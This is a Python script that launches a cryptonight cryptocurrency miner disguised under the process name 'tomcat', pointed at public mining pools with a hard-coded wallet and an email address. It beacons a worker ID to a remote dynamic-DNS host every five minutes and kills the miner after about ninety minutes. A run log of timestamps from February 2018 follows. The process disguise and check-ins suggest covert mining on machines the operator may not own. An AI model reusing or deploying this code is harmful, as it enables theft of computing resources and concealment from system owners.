import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:48:04.113832
#2018-02-17 16:35:02.574787
#2018-02-17 18:23:05.160917
#2018-02-17 20:11:04.921748
#2018-02-17 21:58:06.084638
#2018-02-17 23:42:07.220798
#2018-02-18 01:32:07.251064
#2018-02-18 03:19:04.848576
#2018-02-18 05:08:06.935292
#2018-02-18 07:00:01.537850
#2018-02-18 08:48:05.858145
#2018-02-18 10:35:03.357854
#2018-02-18 12:19:07.083041
#2018-02-18 14:06:04.199252
#2018-02-18 15:55:04.021900
#2018-02-18 17:44:04.312283
#2018-02-18 19:31:07.013011
#2018-02-18 21:16:04.848908
#2018-02-18 23:03:05.880157
#2018-02-19 00:49:07.042740
#2018-02-19 02:36:06.827659
#2018-02-19 04:22:04.450036
#2018-02-19 06:07:02.176489
#2018-02-19 07:55:07.732308
#2018-02-19 09:46:05.132918
#2018-02-19 11:34:09.279083
#2018-02-19 13:21:05.172691
#2018-02-19 15:08:08.515033
#2018-02-19 16:57:06.254146
#2018-02-19 18:46:02.338709
#2018-02-19 20:37:04.092547
#2018-02-19 22:23:05.365843
#2018-02-20 00:09:05.657663
#2018-02-20 01:57:03.196112
#2018-02-20 03:46:08.330765
#2018-02-20 05:31:01.960837
#2018-02-20 07:15:08.094266
#2018-02-20 09:02:06.941835
#2018-02-20 10:46:10.511819
#2018-02-20 12:32:08.038941
#2018-02-20 14:19:08.149374
#2018-02-20 16:01:05.397462
#2018-02-20 17:48:10.882425
#2018-02-20 19:33:09.266500
#2018-02-20 21:21:08.923659
#2018-02-20 23:05:09.864708
#2018-02-21 00:49:05.500951
#2018-02-21 02:34:06.188983
#2018-02-21 04:22:05.352965
#2018-02-21 06:09:01.444649
#2018-02-21 07:55:23.058519
#2018-02-21 09:43:04.871887
#2018-02-21 11:33:01.320039
#2018-02-21 13:21:05.202711
#2018-02-21 15:06:04.541799
#2018-02-21 16:55:08.596910
#2018-02-21 18:45:01.388813
#2018-02-21 20:33:06.794803
#2018-02-21 22:21:03.929731
#2018-02-22 00:12:08.321413
#2018-02-22 02:01:06.949219
#2018-02-22 03:47:04.043459
#2018-02-22 05:33:07.662965
#2018-02-22 07:18:03.469916
#2018-02-22 09:05:06.283717
#2018-02-22 10:52:09.977351
#2018-02-22 12:38:01.617212
#2018-02-22 14:23:06.115713
#2018-02-22 16:12:11.900166
#2018-02-22 18:02:09.360035
#2018-02-22 19:52:01.968943
#2018-02-22 21:42:07.070275
#2018-02-22 23:28:08.208700
#2018-02-23 01:18:07.472253
#2018-02-23 03:03:05.348332
#2018-02-23 04:49:06.832291
#2018-02-23 06:35:04.326555
#2018-02-23 08:23:06.254317
#2018-02-23 10:39:07.629074
#2018-02-23 12:33:08.617582
#2018-02-23 14:19:04.148401
#2018-02-23 16:11:07.894302
#2018-02-23 17:57:04.939535
#2018-02-23 19:43:03.697132
#2018-02-23 21:26:06.645258
#2018-02-23 23:16:08.262064
#2018-02-24 01:02:07.765350
#2018-02-24 02:54:05.369218
#2018-02-24 04:42:07.282024
#2018-02-24 06:26:06.942507
#2018-02-24 08:14:05.011375
#2018-02-24 09:58:06.804476
#2018-02-24 11:53:06.703416
#2018-02-24 13:43:04.450699
#2018-02-24 15:33:01.252017
#2018-02-24 17:27:05.698219
#2018-02-24 19:14:06.802321
#2018-02-24 21:03:06.188599
#2018-02-24 23:37:04.761566
#2018-02-25 02:57:07.013419
#2018-02-25 06:44:05.143692